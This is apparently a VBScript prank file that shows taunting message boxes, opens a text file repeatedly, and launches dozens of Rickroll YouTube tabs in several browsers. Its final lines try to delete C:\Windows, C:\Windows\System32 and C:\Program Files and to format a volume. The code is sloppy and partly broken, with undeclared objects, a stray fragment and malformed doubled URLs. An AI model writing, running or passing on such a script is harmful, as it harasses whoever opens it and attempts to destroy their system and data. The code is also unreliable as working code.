
X=MsgBox("hello sussy",0+16,"oh no")
X=MsgBox("why did you open this???",0+16,"lol")
X=MsgBox("your pc has infected by rick rool",0+16,"oh no")
X=MsgBox("look at this dude",0+16,"lol")
shell.Run "%windowsDir%System32RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters", 1, True Change the file "rick rool lol.jpeg
wshshell.run "lmao.txt"
wshshell.run "lmao.txt"
wshshell.run "lmao.txt"
wshshell.run "lmao.txt"
wshshell.run "lmao.txt"
wshshell.run "lmao.txt"
wshshell.run "lmao.txt"
wshshell.run "lmao.txt"
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://https://www.youtube.com/watch?v=dQw4w9WgXcQ&pp=ygUJcmljayByb29s","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM C
Set C=CreateObject("Shell.Application")
C.ShellExecute "Chrome.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM A
Set A=CreateObject("Shell.Application")
A.ShellExecute "Iexplore.exe","https://youtu.be/ZXsQAXx_ao0","","",1
DIM D
Set D=CreateObject("Shell.Application")
D.ShellExecute "Opera.exe","https://youtu.be/ZXsQAXx_ao0","","",1
objFSO.DeleteFile("C:\Windows\System32")
objFSO.DeleteFile("C:\Program Files")
objFSO.DeleteFile("C:\Windows")
errResult = objVolume.Format("NTFS", true)




